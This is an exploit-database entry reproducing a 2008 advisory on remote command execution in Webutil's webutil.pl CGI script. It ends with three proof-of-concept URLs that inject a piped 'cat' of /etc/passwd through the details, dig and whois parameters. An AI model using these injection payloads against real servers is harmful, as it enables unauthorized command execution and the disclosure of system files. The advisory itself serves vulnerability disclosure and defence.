Webutil 2.3/2.7 - 'webutil.pl' Multiple Remote Command Execution Vulnerabilities

2008-03-21T00:00:00
ID EDB-ID:31466
Type exploitdb
Reporter Zero X
Modified 2008-03-21T00:00:00

Description

Webutil 2.3/2.7 'webutil.pl' Multiple Remote Command Execution Vulnerabilities. CVE-2008-6555. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/28393/info

Webutil is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input.

Successful attacks can compromise the affected application and possibly the underlying computer.

These issues affect Webutil 2.3 and 2.7. 

http://www.example.com/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd